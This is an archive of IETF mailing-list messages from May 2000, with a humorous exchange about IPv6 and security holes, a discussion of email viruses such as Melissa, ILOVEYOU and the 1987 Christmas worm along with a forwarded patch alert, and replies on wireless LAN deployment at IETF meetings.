>No! We don't want to fix the holes! We want to keep a record of them
>without telling the admins, and when they misbehave, not only can we pop
>their kneecaps, set fire to their house, release information to their
>families they wouldn't want to be released, but also as a grand finale,
>we can take control of the machine and do what we wanted anyway.
>Eventually, we as the IETF would have complete control of every machine
>connected to the Internet, thereby giving us control of the entire
>planet, which in turn would allow us to park wherever we wanted and
>*not*get*a*ticket*!!!!!! :-)
>
>--
>Paul Robinson - Developer/Sys Admin @ Akitanet http://www.akitanet.co.uk
>------------------------------------------------------------------------
=================================================================
I moved to a new MCI WorldCom facility on Nov 11, 1999
MCI WorldCom
22001 Loudoun County Parkway
Building F2, Room 4115, ATTN: Vint Cerf
Ashburn, VA 20147
Telephone (703) 886-1690
FAX (703) 886-0047
"INTERNET IS FOR EVERYONE!"
See you at INET2000, Yokohama, Japan July 18-21, 2000
http://www.isoc.org/inet2000
>From owner-ietf-outbound Wed May 10 14:40:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA01980
for [EMAIL PROTECTED]; Wed, 10 May 2000 14:40:03 -0400 (EDT)
Received: from rottweiler.cwusa.com (rottweiler-dmz.cwusa.com [146.135.88.50])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA01917
for <[EMAIL PROTECTED]>; Wed, 10 May 2000 14:35:58 -0400 (EDT)
Received: from us-cwi-exc-a10.cwusa.com (us-cwi-exc-a10.cwusa.com [146.135.85.143])
by rottweiler.cwusa.com (8.9.1/8.9.1) with ESMTP id OAA12791;
Wed, 10 May 2000 14:33:49 -0400 (EDT)
Received: by us-cwi-exc-a10.cwi.cablew.com with Internet Mail Service (5.5.2650.21)
id <KMCKSB1Z>; Wed, 10 May 2000 14:33:44 -0400
Message-ID: <[EMAIL PROTECTED]>
From: "BookIII, Robert" <[EMAIL PROTECTED]>
To: "'vinton g. cerf'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
"'Paul Robinson'"
<[EMAIL PROTECTED]>,
"'Tripp Lilley'" <[EMAIL PROTECTED]>
Cc: "'Keith Moore'" <[EMAIL PROTECTED]>, "'Greg Skinner'" <[EMAIL PROTECTED]>,
[EMAIL PROTECTED]
Subject: RE: IPv6: Past mistakes repeated?
Date: Wed, 10 May 2000 14:33:42 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Vinton retiring to a cabin in Montana? (......this is ominous......vaguely
horrifying visions based on the "War Games" come flitting by......) Will you
be leaving us any WOPRs in IPv6? :-)
-----Original Message-----
From: vinton g. cerf [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 10, 2000 5:56 AM
To: [EMAIL PROTECTED]; 'Paul Robinson'; 'Tripp Lilley'
Cc: 'Keith Moore'; 'Greg Skinner'; [EMAIL PROTECTED]
Subject: RE: IPv6: Past mistakes repeated?
At 10:39 AM 5/8/2000 -0700, Jim Stephenson-Dunn wrote:
>No! We don't want to fix the holes! We want to keep a
record of them
>without telling the admins, and when they misbehave, not
only can we pop
>their kneecaps, set fire to their house, release
information to their
>families they wouldn't want to be released, but also as a
grand finale,
>we can take control of the machine and do what we wanted
anyway.
>Eventually, we as the IETF would have complete control of
every machine
>connected to the Internet, thereby giving us control of the
entire
>planet, which in turn would allow us to park wherever we
wanted and
>*not*get*a*ticket*!!!!!! :-)
Dang! Jim's gone and uncovered my nefarious retirement plan.
Now I'll
have to think of something else :-(
Jim, you left out the "Nyah-ha-ha-ha-ha-ha!" part...
vint
p.s. apologies to IETF list for cluttering with this. It
just slipped out.
=================================================================
I moved to a new MCI WorldCom facility on Nov 11, 1999
MCI WorldCom
22001 Loudoun County Parkway
Building F2, Room 4115, ATTN: Vint Cerf
Ashburn, VA 20147
Telephone (703) 886-1690
FAX (703) 886-0047
"INTERNET IS FOR EVERYONE!"
See you at INET2000, Yokohama, Japan July 18-21, 2000
http://www.isoc.org/inet2000
>From owner-ietf-outbound Wed May 10 15:00:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA02296
for [EMAIL PROTECTED]; Wed, 10 May 2000 15:00:01 -0400 (EDT)
Received: from apollo.predictive.com (apollo.predictive.com [208.209.197.196])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA02248
for <[EMAIL PROTECTED]>; Wed, 10 May 2000 14:57:42 -0400 (EDT)
From: [EMAIL PROTECTED]
To: "BookIII, Robert" <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: RE: IPv6: Past mistakes repeated?
X-Mailer: Lotus Notes Release 5.0.2a (Intl) 23 November 1999
Message-ID: <[EMAIL PROTECTED]>
Date: Wed, 10 May 2000 13:57:37 -0500
X-MIMETrack: Serialize by Router on Apollo/Predictive(Release 5.0.3 (Intl)|21 March
2000) at
05/10/2000 02:57:48 PM,
Serialize complete at 05/10/2000 02:57:48 PM
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Robert,
Thanks for the War Games references.
It actually made me lol and salvage an otherwise awful day.
Cheers!
----------------------------------
Randall Gale
Information Security
Predictive Systems
vox: 781-751-9629
fax: 781-329-9343
mailto:[EMAIL PROTECTED]
http://www.predictive.com
----------------------------------
>From owner-ietf-outbound Thu May 11 00:40:28 2000
Received: by ietf.org (8.9.1a/8.9.1a) id AAA09463
for [EMAIL PROTECTED]; Thu, 11 May 2000 00:40:02 -0400 (EDT)
Received: from basecamp1.netquest.net (netquest.net [204.140.219.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id AAA09426
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 00:37:26 -0400 (EDT)
Received: from nma.com (dsl0016.netquest.net [206.117.109.16]) by
basecamp1.netquest.net (8.8.8/8.8.6) with ESMTP id VAA08679; Wed, 10 May 2000 21:37:56
-0700 (PDT)
To: Brant Knudson <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Sat, 06 May 2000 00:38:29 -0000."
<[EMAIL PROTECTED]>
Reply-to: [EMAIL PROTECTED]
From: Einar Stefferud <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <[EMAIL PROTECTED]>
Date: Wed, 10 May 2000 21:36:28 -0700
Message-ID: <[EMAIL PROTECTED]>
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
The pattern is longer than you remember;-)...
>From Brant's message Sat, 06 May 2000 00:38:29 +0000:
}
}I think I'm starting to see a pattern emerging in email viruses.
}
}Melissa: Uses script to read user's address book to get the email
}addresses of new victims.
}ILOVEYOU: Uses script to read user's address book to get the email
}addresses of new victims.
}
}What method do you think the next email virus is going to use if
}Microsoft doesn't stop scripts from reading people's address books? Why
}didn't MS plug this hole after Melissa?
}
}Brant
The first of these "worm/virus/addressbookmailers" was the IBM PROFS
"Chrismas Card" caper that occurred some time in the early 1990's,
long before MS willfully adopted the design.
((Aside: Do you suppose that MS wants to be like IBM so much that
they are making all the same mistakes in the same serial order?))
Seems to me that this beloved "feature" (giving root privs to random
EMail messages) should (by now) now be fully discredited, and should
be destined for extinction, if only the customers will accept its
disappearance in trade for an absence of a continuing flood of these
$6,000,000,000 economic loss episodes.
This is a perfect proof of a conjecture made by Hasan Azbekan back in
the mid 1960's that "The Triumph of Technology is: Can Implies Shall".
There is no way to stop this kind of thing repeating and repeating
until the easily subverted facility disappears from the Internet. And
as long as the customers demand it, it will continue;-)... It is easy
to blame the vendors, but they are trapped into selling what the
customers demand. So, the fault lies with the customers choices;-)...
And, they, led by the Fortune 2000, have rewarded MS handsomely for
creating the fertile ground for propagation.
For myself, I am contributing to the solution by never ever running
any kind of MS mail tool, ever again. You see, I do not blame MS for
this. I blame all the users of MS Mail tools for buying into the
game, and I am doing all that I can to make sure that I do not pay the
price for their disregard for their own safety and security.
I am pleased to say that I have not knowingly received a single copy
of the "LOVE BUG", even via mailing lists, though I do have to admit
to a certain sense of being unloved because of this great lack;-)...
Cheers...\Stef
>From owner-ietf-outbound Thu May 11 07:50:55 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA24476
for [EMAIL PROTECTED]; Thu, 11 May 2000 07:50:02 -0400 (EDT)
Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com
[135.207.30.103])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA24272
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 07:40:37 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-green.research.att.com (Postfix) with ESMTP
id BD89D1E008; Thu, 11 May 2000 07:40:37 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id HAA21890;
Thu, 11 May 2000 07:40:36 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 2A6D135DC2; Thu, 11 May 2000 07:40:27 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: Brant Knudson <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 11 May 2000 07:40:26 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, Einar Stefferud writes:
>
>The first of these "worm/virus/addressbookmailers" was the IBM PROFS
>"Chrismas Card" caper that occurred some time in the early 1990's,
>long before MS willfully adopted the design.
It was in December, 1987.
>
>Seems to me that this beloved "feature" (giving root privs to random
>EMail messages) should (by now) now be fully discredited, and should
>be destined for extinction, if only the customers will accept its
>disappearance in trade for an absence of a continuing flood of these
>$6,000,000,000 economic loss episodes.
See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how
it worked -- but it didn't involve any analog to 'root' privileges.
When the recipient got a copy, there was an included (or attached; I
don't quite remember) REXX file. (REXX was a scripting language for VM/
CMS.) The message told you that it would display a Christmas card if
you ran it; most users did just that, since the note appeared to come
from someone they knew. And then the file replicated itself; you all
know the rest.
Note the two crucial points -- it ran with the user's permissions, and
it was explicitly run by the user, rather than by any automatic
mechanism.
--Steve Bellovin
>From owner-ietf-outbound Thu May 11 08:00:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA24813
for [EMAIL PROTECTED]; Thu, 11 May 2000 08:00:03 -0400 (EDT)
Received: from kuji.off.connect.com.au (kuji.off.connect.com.au [203.63.69.33])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA24430
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 07:48:24 -0400 (EDT)
Received: by kuji.off.connect.com.au (Postfix, from userid 170)
id 7E98610B25; Thu, 11 May 2000 21:17:52 +0930 (CST)
Received: from connect.com.au (localhost [127.0.0.1])
by kuji.off.connect.com.au (Postfix) with ESMTP
id 651326F6A; Thu, 11 May 2000 21:17:52 +0930 (CST)
To: "Fred L. Templin" <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: Wireless LAN experiences from the IETF meetings?
In-reply-to: Your message of "Tue, 09 May 2000 14:12:28 MST."
<[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 21:17:46 +0930
From: Mark Prior <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
We are investigating the deployment of a wireless LAN infrastructure
(IEEE 802.11) for our building and were hoping to tap into past
experiences from wireless LAN deployments at the IETF meetings. Are
there any documents online that present "guidelines" for deployment
of wireless LANs at the IETF meetings? Alternatively, can anyone
recommend other documents which might help get us started - especially
along the lines of strategic deployment of IEEE 802.11 access points?
I'm not aware of any such documents. The problem with the IETF is that
every venue is different with it's own properties. For example we were
told that the Adelaide Convention Centre was relatively radio
transparent but when we got there and the inter Hall walls were put in
place we found that they weren't. This meant that the original plan
was out the window and it was back to mapping the venue as the AP's
were installed (together with installing more APs, including one in
each of the large halls which wasn't in the original plan).
I think you really need to borrow some kit and find out what your
environment is like.
Mark.
>From owner-ietf-outbound Thu May 11 08:30:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA25733
for [EMAIL PROTECTED]; Thu, 11 May 2000 08:30:03 -0400 (EDT)
Received: from hudutilgw.ml.com (hudutilf01.ml.com [198.242.49.31])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA25460
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 08:24:17 -0400 (EDT)
Received: from ehudwt01.exchange.ml.com (ehudwt01.exchange.ml.com [199.201.37.22])
by hudutilgw.ml.com (8.9.3/8.9.3/MLgwo-4.03) with SMTP id IAA02456;
Thu, 11 May 2000 08:24:14 -0400 (EDT)
Received: from 172.20.64.1 by ehudwt01.exchange.ml.com with ESMTP (
WorldSecure Server SMTP Relay(WSS) v4.5); Thu, 11 May 2000 08:24:14
-0400
X-Server-Uuid: 3789b954-9c4e-11d3-af68-0008c73b0911
Received: by epcc01.na2.us.ml.com with Internet Mail Service (
5.5.2650.21) id <KTMASHHP>; Thu, 11 May 2000 08:24:13 -0400
Message-ID: <[EMAIL PROTECTED]>
From: "Castro, Edison M. (PCA)" <[EMAIL PROTECTED]>
To: "'Steven M. Bellovin'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
cc: "Brant Knudson" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Date: Thu, 11 May 2000 08:24:11 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
X-WSS-ID: 150479E481223-01-01
Content-Type: text/plain;
charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
That is exactly the same way that all Windows virus work. As a Windows
user (as well as other OSes), I can say that people have to be responsible
for their actions. Whenever you receive any Email attachment, the only way
that attachment can produce any damage is if you run it.
At least in my copy of MS Word anytime I open a word document and it
contains
any macros, Word readily ask me if I want to allow the macro to execute.
Not only that, this version of Word (2000) is configured to only ask me when
a signed (with a certificate of a trusted party) macro is included.
-----Original Message-----
From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 7:40 AM
To: [EMAIL PROTECTED]
Cc: Brant Knudson; [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In message <[EMAIL PROTECTED]>, Einar Stefferud writes:
>
>The first of these "worm/virus/addressbookmailers" was the IBM PROFS
>"Chrismas Card" caper that occurred some time in the early 1990's,
>long before MS willfully adopted the design.
It was in December, 1987.
>
>Seems to me that this beloved "feature" (giving root privs to random
>EMail messages) should (by now) now be fully discredited, and should
>be destined for extinction, if only the customers will accept its
>disappearance in trade for an absence of a continuing flood of these
>$6,000,000,000 economic loss episodes.
See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how
it worked -- but it didn't involve any analog to 'root' privileges.
When the recipient got a copy, there was an included (or attached; I
don't quite remember) REXX file. (REXX was a scripting language for VM/
CMS.) The message told you that it would display a Christmas card if
you ran it; most users did just that, since the note appeared to come
from someone they knew. And then the file replicated itself; you all
know the rest.
Note the two crucial points -- it ran with the user's permissions, and
it was explicitly run by the user, rather than by any automatic
mechanism.
--Steve Bellovin
>From owner-ietf-outbound Thu May 11 08:50:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA26326
for [EMAIL PROTECTED]; Thu, 11 May 2000 08:50:02 -0400 (EDT)
Received: from tyholt.uninett.no (tyholt.uninett.no [158.38.60.10])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA26199
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 08:44:47 -0400 (EDT)
Received: from heimdal.uninett.no (IDENT:[EMAIL PROTECTED] [158.38.60.79])
by tyholt.uninett.no (8.9.3/8.8.8) with ESMTP id OAA12822;
Thu, 11 May 2000 14:44:43 +0200 (METDST)
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: "Fred L. Templin" <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: Wireless LAN experiences from the IETF meetings?
In-Reply-To: Message from "Fred L. Templin" <[EMAIL PROTECTED]>
of "Tue, 09 May 2000 14:12:28 PDT." <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 11 May 2000 14:44:43 +0200
From: Anders Lund <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
>>>>> On Tue, 9 May 2000, "Fred" == Fred L. Templin wrote:
Fred> We are investigating the deployment of a wireless LAN
Fred> infrastructure (IEEE 802.11) for our building and were hoping
Fred> to tap into past experiences from wireless LAN deployments
Fred> at the IETF meetings. Are there any documents online that
Fred> present "guidelines" for deployment of wireless LANs at the IETF
Fred> meetings?
Some old information about the wireless network at the 45th IETF in Oslo
last summer at:
http://www.uninett.no/ietf45/wlan/
Regards
Anders
--
Anders Lund <[EMAIL PROTECTED]>
UNINETT A/S, N-7465 Trondheim, Norway
Tlf: +47 73 55 79 08 | Fax: +47 73 55 79 01
>From owner-ietf-outbound Thu May 11 09:00:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA26516
for [EMAIL PROTECTED]; Thu, 11 May 2000 09:00:02 -0400 (EDT)
Received: from mail.nbn.net ([EMAIL PROTECTED] [207.51.86.15])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA26287
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 08:49:05 -0400 (EDT)
Received: from server-1 (dial1-29.nbn.net [208.139.67.23])
by mail.nbn.net (8.9.3/8.9.3) with SMTP id IAA16869
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 08:49:05 -0400
Message-ID: <[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 08:58:40 -0400
From: Betsy Brennan <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
X-Mailer: Mozilla 3.04 (Win95; U)
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Thought about Security
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
I was wondering, does it sound like a good idea to take [EMAIL PROTECTED]
out of our address books. This would prevent email virus's from
spreading through this forum. Betsy Brennan
>From owner-ietf-outbound Thu May 11 09:50:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA27994
for [EMAIL PROTECTED]; Thu, 11 May 2000 09:50:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA27897
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 09:44:50 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4BDiak23954;
Thu, 11 May 2000 09:44:36 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: "Castro, Edison M. (PCA)" <[EMAIL PROTECTED]>
cc: "'Steven M. Bellovin'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
Brant Knudson <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 11 May 2000 08:24:11 EDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 11 May 2000 09:44:36 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 11 May 2000 08:24:11 EDT, "Castro, Edison M. (PCA)" said:
> That is exactly the same way that all Windows virus work. As a Windows
> user (as well as other OSes), I can say that people have to be responsible
> for their actions. Whenever you receive any Email attachment, the only way
> that attachment can produce any damage is if you run it.
Well, it's worse. Melissa, the Love Bug, and the Christmas worm all required
the user to take an action (click/open/run the payload).
However, there's apparently ANOTHER hole....
Seen on a SANS posting yesterday:
/Valdis
-- 10 May 2000 Email viruses are now spreading WITHOUT THE USER
OPENING ANY ATTACHMENT.
Personal computers running Internet Explorer (IE) version 5.0 and/or
Microsoft Office 2000 are vulnerable to virus attacks using most email
systems, even if the email recipient opens no attachments. You don't
even have to use IE; just have it installed with the default security
settings. If you have not closed the hole, you can receive viruses (and
spread them) by viewing or previewing malicious email without opening
any attachment, or by visiting a malicious web site. The problem is
caused by a programming bug in an Internet Explorer ActiveX control
called scriptlet.typelib. This is by far the fastest growing virus
distribution problem and ripe for a hugely destructive event - at least
as large as the ILOVEYOU virus. Updating your virus detection software,
while important, is not an effective solution for this problem. You must
also close the hole. The hole can be closed in five minutes or less
using tools available at Microsoft's security site:
http://www.microsoft.com/security/bulletins/ms99-032.asp
The correction script may be run directly from:
http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm
Editor's Note: Thanks to Jimmy Kuo of Network Associates and Nick
FitzGerald of Computer Virus Consulting Ltd. for raising the visibility
of this dangerous problem.
>From owner-ietf-outbound Thu May 11 10:10:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA28520
for [EMAIL PROTECTED]; Thu, 11 May 2000 10:10:02 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA28434
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 10:07:50 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id KAA14658;
Thu, 11 May 2000 10:06:34 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>,
"'Castro, Edison M. (PCA)'" <[EMAIL PROTECTED]>
Cc: "'Steven M. Bellovin'" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>,
"'Brant Knudson'" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 11 May 2000 10:07:13 -0400
Message-ID: <002801bfbb52$357d9c00$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <[EMAIL PROTECTED]>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
I believe the one of the most important holes is html based mail, because
the e-mail is processed as a webpage which can be used to download
undesirable content. If you configure your e-mail browser to display all
messages as text you will close this hole...You will notice my e-mails are
nearly 100% text
Scot
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 11, 2000 9:45 AM
To: Castro, Edison M. (PCA)
Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; Brant Knudson; [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
On Thu, 11 May 2000 08:24:11 EDT, "Castro, Edison M. (PCA)" said:
> That is exactly the same way that all Windows virus work. As a Windows
> user (as well as other OSes), I can say that people have to be responsible
> for their actions. Whenever you receive any Email attachment, the only
way
> that attachment can produce any damage is if you run it.
Well, it's worse. Melissa, the Love Bug, and the Christmas worm all
required
the user to take an action (click/open/run the payload).
However, there's apparently ANOTHER hole....
Seen on a SANS posting yesterday:
/Valdis
-- 10 May 2000 Email viruses are now spreading WITHOUT THE USER
OPENING ANY ATTACHMENT.
Personal computers running Internet Explorer (IE) version 5.0 and/or
Microsoft Office 2000 are vulnerable to virus attacks using most email
systems, even if the email recipient opens no attachments. You don't
even have to use IE; just have it installed with the default security
settings. If you have not closed the hole, you can receive viruses (and
spread them) by viewing or previewing malicious email without opening
any attachment, or by visiting a malicious web site. The problem is
caused by a programming bug in an Internet Explorer ActiveX control
called scriptlet.typelib. This is by far the fastest growing virus
distribution problem and ripe for a hugely destructive event - at least
as large as the ILOVEYOU virus. Updating your virus detection software,
while important, is not an effective solution for this problem. You must
also close the hole. The hole can be closed in five minutes or less
using tools available at Microsoft's security site:
http://www.microsoft.com/security/bulletins/ms99-032.asp
The correction script may be run directly from:
http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm
Editor's Note: Thanks to Jimmy Kuo of Network Associates and Nick
FitzGerald of Computer Virus Consulting Ltd. for raising the visibility
of this dangerous problem.
>From owner-ietf-outbound Thu May 11 10:30:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA28873
for [EMAIL PROTECTED]; Thu, 11 May 2000 10:30:02 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA28730
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 10:20:20 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id IAA24787
for [EMAIL PROTECTED] env-from <vjs>;
Thu, 11 May 2000 08:20:19 -0600 (MDT)
Date: Thu, 11 May 2000 08:20:19 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
X-Loop: [EMAIL PROTECTED]
> From [EMAIL PROTECTED] Thu May 11 06:36:01 2000
> From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]]
> ...
> > Note the two crucial points -- it ran with the user's permissions, and
> > it was explicitly run by the user, rather than by any automatic
> > mechanism.
> From: "Castro, Edison M. (PCA)" <[EMAIL PROTECTED]>
> That is exactly the same way that all Windows virus work. As a Windows
> user (as well as other OSes), I can say that people have to be responsible
> for their actions. Whenever you receive any Email attachment, the only way
> that attachment can produce any damage is if you run it.
> ...
> Not only that, this version of Word (2000) is configured to only ask me when
> a signed (with a certificate of a trusted party) macro is included.
There are serious mistakes in that.
First, is the perhaps minor point that rumor has it that Outlook Express
(as opposed to Outlook) is eager to open attachments automatically.
Second, what matters is not only what configuration changes can be made
to close some of the holes, but how systems are configured by default
from the CDROM's and how they are most commonly configured in practice.
Third, and where the first serious mistake lies, on Windows 98 the worm
did not run with merely the user's permissions. That constrasts with
reasonable operating systems, where much of its damage would be impossible.
Forth, the most serious problem is that most computer users and many who
consider themselves more than mere users have no clue what is meant by
"the user's permissions." The main desktop operating system vendors can
be blamed more for obscuring that notion among users than for their other
crimes. It is the equivalent of refusing to equip cars with seat belts,
air bags, stop lights and tail lights on grounds of "user-friendliness."
Never mind that the current worm involved Visual Basic instead of Word
macros. Regardless of the programming language, given the familiar
"feature rich," "user friendliness," it's probably trivial for a worm to
find the user's signature and sign its spawn. You wouldn't want users to
need to type a passphrase, use a smart card, or anything else so
complicated and user-unfriendly merely to send mail, would you? Thus,
the next act in this circus will not only involve email from people you
know (as this one did), but it will also be cryptographically signed by
the apparent senders.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 11 10:50:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA29387
for [EMAIL PROTECTED]; Thu, 11 May 2000 10:50:02 -0400 (EDT)
Received: from btw.plaintalk.bellevue.wa.us (btw-xl1.plaintalk.bellevue.wa.us
[206.129.5.130])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA29343
for <[EMAIL PROTECTED]>; Thu, 11 May 2000 10:48:20 -0400 (EDT)
Received: from software-munitions.com (fwiw.plaintalk.bellevue.wa.us [206.129.5.157])
by btw.plaintalk.bellevue.wa.us (8.10.1/8.10.1) with ESMTP id e4BEkmP23834;
Thu, 11 May 2000 07:46:48 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Thu, 11 May 2000 07:46:48 -0700
From: Dennis Glatting <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Scot Mc Pherson <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED],
"'Castro, Edison M. (PCA)'" <[EMAIL PROTECTED]>,
"'Steven M. Bellovin'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
"'Brant Knudson'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
References: <002801bfbb52$357d9c00$[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Scot Mc Pherson wrote:
>
> I believe the one of the most important holes is html based mail, because
